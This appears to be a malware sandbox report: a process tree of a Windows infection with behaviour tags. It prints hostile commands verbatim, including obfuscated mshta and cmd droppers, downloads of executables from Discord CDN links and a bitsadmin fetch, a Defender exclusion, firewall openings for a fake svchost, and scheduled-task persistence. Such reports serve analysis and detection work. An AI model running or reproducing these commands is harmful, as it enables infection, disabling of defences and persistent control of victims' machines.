C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\0Ynwrny1xR6Ce3aFOdXaV7vd.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "0Ynwrny1xR6Ce3aFOdXaV7vd.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\e3ciN45LF9YSOx5uTssM_4x6.exe"C:\Users\Admin\Pictures\Adobe Films\e3ciN45LF9YSOx5uTssM_4x6.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\3fQcxDlp43cF_Lkgp2hF3etw.exe"C:\Users\Admin\Pictures\Adobe Films\3fQcxDlp43cF_Lkgp2hF3etw.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 8963⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\m4B4l9UNQFjYJy2qOZ8ywGcq.exe"C:\Users\Admin\Pictures\Adobe Films\m4B4l9UNQFjYJy2qOZ8ywGcq.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\07110_23KBD6OrY29SHSSWf2.exe"C:\Users\Admin\Pictures\Adobe Films\07110_23KBD6OrY29SHSSWf2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 16244⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\I5ybN5GcFFp2qz4bO557reWX.exe"C:\Users\Admin\Pictures\Adobe Films\I5ybN5GcFFp2qz4bO557reWX.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Application Data\S8LGJghE7EKxPiR6DNQktZgV.exe"C:\ProgramData\Application Data\S8LGJghE7EKxPiR6DNQktZgV.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\Uv2OLZQGQUISQFphMrVjFyks.exe"C:\Users\Admin\Pictures\Adobe Films\Uv2OLZQGQUISQFphMrVjFyks.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\DC7E.bat "C:\Users\Admin\Pictures\Adobe Films\Uv2OLZQGQUISQFphMrVjFyks.exe""3⤵
-
C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32459\Transmissibility.exeTransmissibility.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\YTDtEif11P99NgeKwT6fC4ch.exe"C:\Users\Admin\Pictures\Adobe Films\YTDtEif11P99NgeKwT6fC4ch.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe"C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe"C:\Users\Admin\Pictures\Adobe Films\CObebYmiTdY_PuwpkFiVDpKe.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe"C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe"C:\Users\Admin\Pictures\Adobe Films\uIhpaXRSRc02XMvQzI27rw3i.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\E7hLWHgMHAmG2ptzTZk60djt.exe"C:\Users\Admin\Pictures\Adobe Films\E7hLWHgMHAmG2ptzTZk60djt.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"C:\Users\Admin\Pictures\Adobe Films\CQ4wIy1JUrHTND_rGM2Jhn8d.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\e4XxYUrzhL2kFffGJzG8cKA3.exe"C:\Users\Admin\Pictures\Adobe Films\e4XxYUrzhL2kFffGJzG8cKA3.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-RGR9L.tmp\e4XxYUrzhL2kFffGJzG8cKA3.tmp"C:\Users\Admin\AppData\Local\Temp\is-RGR9L.tmp\e4XxYUrzhL2kFffGJzG8cKA3.tmp" /SL5="$1025A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\e4XxYUrzhL2kFffGJzG8cKA3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-86Q9R.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-86Q9R.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Windows Defender\DXNCRVFAOV\foldershare.exe"C:\Program Files\Windows Defender\DXNCRVFAOV\foldershare.exe" /VERYSILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\c9-ea62f-f8f-c23ad-159f0c7797aa6\Velyxomere.exe"C:\Users\Admin\AppData\Local\Temp\c9-ea62f-f8f-c23ad-159f0c7797aa6\Velyxomere.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 21566⤵
-
C:\Users\Admin\AppData\Local\Temp\b2-27241-7f3-18593-84a570bdd34da\Kakanenytae.exe"C:\Users\Admin\AppData\Local\Temp\b2-27241-7f3-18593-84a570bdd34da\Kakanenytae.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fgifpcqz.fj3\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\fgifpcqz.fj3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\fgifpcqz.fj3\GcleanerEU.exe /eufive7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exeC:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe /qn CAMPAIGN="654"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634658802 /qn CAMPAIGN=""654"" " CAMPAIGN="654"8⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nzubdjhm.ceh\any.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\nzubdjhm.ceh\any.exeC:\Users\Admin\AppData\Local\Temp\nzubdjhm.ceh\any.exe7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2pvqxgu2.3dj\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\2pvqxgu2.3dj\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\2pvqxgu2.3dj\gcleaner.exe /mixfive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvuzdw4f.erh\autosubplayer.exe /S & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\hvuzdw4f.erh\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\hvuzdw4f.erh\autosubplayer.exe /S7⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z8⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe"C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0xbc,0xc0,0x1c4,0xb8,0x1e8,0x7ffbdd09dec0,0x7ffbdd09ded0,0x7ffbdd09dee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=1768 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1716 /prefetch:25⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=2140 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:15⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2496 /prefetch:15⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=1760 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=2728 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2960 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=3560 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=3192 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Temp\8A71.exeC:\Users\Admin\AppData\Local\Temp\8A71.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\8A71.exeC:\Users\Admin\AppData\Local\Temp\8A71.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\C9E7.exeC:\Users\Admin\AppData\Local\Temp\C9E7.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\F190.exeC:\Users\Admin\AppData\Local\Temp\F190.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\9CC.exeC:\Users\Admin\AppData\Local\Temp\9CC.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "build" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1634221883\build.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\CA7D.exeC:\Users\Admin\AppData\Local\Temp\CA7D.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 431FE157C0E32D0251951062DF69A907 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B7375794B221769BCEC123186368BF242⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 66C98483DA9D950172B62405CD56EE78 E Global\MSI00002⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exe"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211022-1608.dm1⤵
-
